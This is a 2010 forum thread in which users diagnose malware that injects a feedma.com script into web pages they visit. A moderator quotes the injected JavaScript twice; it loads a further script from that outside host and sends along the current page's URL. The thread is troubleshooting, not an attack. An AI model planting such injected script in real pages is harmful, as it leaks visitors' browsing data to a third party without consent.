Back To General Discussion

Virus adds javascript to sites

  • Don2007
  • Web Master
  • Web Master
  • No Avatar
  • Joined: Nov 21, 2006
  • Posts: 4924
  • Loc: NY
  • Status: Offline

Post January 4th, 2010, 3:13 pm

No, he said to all the pages of the feedma site, not all sites.
How do you know when a politician is lying? His mouth is moving.
  • Anonymous
  • Bot
  • No Avatar
  • Joined: 25 Feb 2008
  • Posts: ?
  • Loc: Ozzuland
  • Status: Online

Post January 4th, 2010, 3:13 pm

  • ATNO/TW
  • Super Moderator
  • Super Moderator
  • User avatar
  • Joined: May 28, 2003
  • Posts: 23407
  • Loc: Woodbridge VA
  • Status: Offline

Post January 4th, 2010, 4:04 pm

Did anyone download http://feedma.com/cgi-bin/cont/cont.cgi?uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113} ?

It yields:

Code: [ Select ]
if(top == self)
{
    document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
}
//
  1. if(top == self)
  2. {
  3.     document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
  4. }
  5. //


What's up with that?
"There's no place like 127.0.0.1 except for ::1."
Alexandria Networks. Leader in IT consulting for associations/non-profits, and small to medium sized businesses around the northern Virginia and Washington D.C. metro area.
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Joined: Jul 18, 2008
  • Posts: 239
  • Loc: Western Australia
  • Status: Offline

Post January 4th, 2010, 9:55 pm

grinch2171 wrote:
alex89 wrote:
13 objects found after 12 minutes of scanning. Should have got a mac.


I love it when people make comments like this, I find it hilarious. I haven't run an anti-virus, anti-malware, or anti-anything software on any of my home computers in years and I haven't caught a virus or anything malicious during that time. I do run a hardware firewall though. I also have two kids using those PC's and nothing. People like to point fingers at Microsoft and say it is their fault but it isn't. Most of the time it is your fault you got a virus. You clicked on something you shouldn't have, you opened an attachment you shouldn't have, or whatever. The bottom line is, you did something not Microsoft.


Moderate trolling is successful. :P

I'm well aware that it's my fault this happened, I'm just kidding. Although I do respect macs for some of their traits (interface design especially).

joebert wrote:
Noscript for Firefox, nice. How does that help you as far as IE or the thing you probably have running in the background looking for nasty updates ?

What I want to know, is how is this thing making that line show up in the HTML source you're viewing ?
Are you sure you're not going through a proxy that's adding it or something ?

I would think that if something's hijacking the page inbetween the time it gets to your computer, to the time it gets saved to the HTML cache and displayed, ALL browsers would be affected. :scratchhead:


IE isn't running, and there aren't any processes running that I don't know exactly what they do. (I like to run a tight ship - no extra services/startup/processes than necessary)

That's what I thought as well, but it definitely didn't occur in Safari or Chrome. It's odd. No proxy.

digitalMedia wrote:
The virus is inserting that snippet into all the sites he views.


Yeah you're right. Sorry if I was unclear Don.

ATNO/TW wrote:
Did anyone download http://feedma.com/cgi-bin/cont/cont.cgi?uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113} ?

It yields:

Code: [ Select ]
if(top == self)
{
    document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
}
//
  1. if(top == self)
  2. {
  3.     document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
  4. }
  5. //


What's up with that?


If it's the top frame, add that script again? Wouldn't it loop? I don't know. I think it's probably more for tracking than ads or something malicious. Feel free to correct me if I'm wrong.

Good news though - I left a few scanners on last night, and it isn't happening any more. Had to restart to remove/repair a DLL, I think that was probably it. Does anyone know of a DLL that IE and FF share? I wish I knew more about this kind of thing.

But thanks for all the responses :)

1, 2

Post Information

  • Total Posts in this topic: 18 posts
  • Users browsing this forum: No registered users and 113 guests
  • You cannot post new topics in this forum
  • You cannot reply to topics in this forum
  • You cannot edit your posts in this forum
  • You cannot delete your posts in this forum
  • You cannot post attachments in this forum
 
 

© 2011 Unmelted, LLC. Ozzu® is a registered trademark of Unmelted, LLC.